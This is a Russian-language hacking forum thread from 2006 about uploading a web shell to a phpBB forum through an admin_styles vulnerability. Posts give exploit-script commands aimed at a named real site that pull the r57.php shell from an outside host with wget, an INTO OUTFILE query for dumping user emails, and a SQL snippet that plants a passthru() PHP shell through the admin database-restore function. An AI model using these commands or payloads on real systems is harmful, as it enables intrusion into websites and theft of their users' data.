ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу phpBB. Как залить шелл через уязвимость в admin_styles?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

phpBB. Как залить шелл через уязвимость в admin_styles?
  #1  
Старый 13.01.2006, 18:49
Аватар для Grema
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию phpBB. Как залить шелл через уязвимость в admin_styles?
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux
 
Ответить с цитированием

  #2  
Старый 13.01.2006, 19:02
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
wget -o серверный_путь путь_к_твоему_шеллу.
В следующий раз попробуй найти это через поиск.
зы. wget может вообще не быть. В общем всё это ещё раз описывалось в течении двух последних дней.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 13.01.2006, 20:12
Аватар для Grema
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию
чтото не кактит...
з.Ы. wget есть точно...
юзал так
Код:
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o /home/webadmin/pvp-alfa.com.ru/html/phpBB2/cache/r57
.php http://games.tenet.ua/board/uploads/r57.php"
и так

Код:
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o r57.php http://games.tenet.ua/board/uploads/r57.php"
 
Ответить с цитированием

  #4  
Старый 13.01.2006, 20:42
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию
Цитата:
Сообщение от Grema  
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux
Поюзай поиск на форуме это уже обсуждалось !
Azazel правильно сказал !
 
Ответить с цитированием

  #5  
Старый 13.01.2006, 20:44
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Через БД
 
Ответить с цитированием

  #6  
Старый 13.01.2006, 20:48
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию
Цитата:
Сообщение от _-[A.M.D]HiM@S-_  
Через БД
а не влом сливать 30 метров базы к примеру править её и заливать обратно ????

а если как на этом форуме http://пожалуста.безссылок.ru

Там пользователей и тем валом у них база 1GB весит не бось....
Так что это не вариант.....
Последний раз редактировалось Azazel; 13.01.2006 в 22:32..
 
Ответить с цитированием

  #7  
Старый 13.01.2006, 22:21
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Там помойму стоит 2.0.16
 
Ответить с цитированием

  #8  
Старый 14.01.2006, 01:29
Аватар для _lolik_
_lolik_
Познающий
Регистрация: 08.01.2006
Сообщений: 91
Провел на форуме:
115752

Репутация: 5
Отправить сообщение для _lolik_ с помощью ICQ
По умолчанию
SELECT email FROM users INTO OUTFILE 'c:/text.txt'
это для мейлов, дла хешей немного другая команда в БД
 
Ответить с цитированием

  #9  
Старый 14.01.2006, 03:22
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию
сливать базу не обязательно можно и подругому - так создать файл с содержанием:

UPDATE phpbb_categories SET cat_title='<? passthru("$cmd"); ?>'WHERE cat_id=1;
SELECT cat_title INTO OUTFILE '/home/bla_bla_bla/shell.php' FROM phpbb_categories where cat_id=1;

потом просто выбираешь в админке восстановить базу и указываешь путь к этому файу. это создаст шел не испортив основную базу.
 
Ответить с цитированием

  #10  
Старый 14.01.2006, 10:16
Аватар для Grema
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию
там стоит 2.0.17
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
залить шелл через ipb 2.0.4 alakazam Форумы 4 16.11.2005 22:08
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Форумы 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ